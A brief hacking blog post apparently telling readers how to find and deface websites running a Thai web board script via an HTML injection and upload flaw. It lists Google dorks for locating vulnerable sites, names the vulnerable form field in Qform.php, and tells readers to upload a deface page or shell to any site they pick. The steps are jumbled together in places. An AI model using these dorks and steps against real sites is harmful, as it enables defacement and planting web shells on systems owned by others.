Hello Readers! today im gonna share a HTML Injection Vulnerability. This works most on Thailand web pages :). So lets start..
Chiangraientersoft HTML Injection Vulnerability:
1). Go to google and type any of the following dorks :-
inurl:Qread.php?id_ques=2). Pick any site!..and replace everything after yoursite.com/ with anyone of the following [Exploit] :
inurl:webboard/Qread.php?id_ques=
Vulnerable at 'Qform.php' at Field Subject/Title
/webboard/Qform.php3). Just fill-up the forum and upload your deface page shell etc..
/board/Qform.php
After your file is successfully uploaded, it would be listed at www.site.com/board/ or www.site.com/webboard/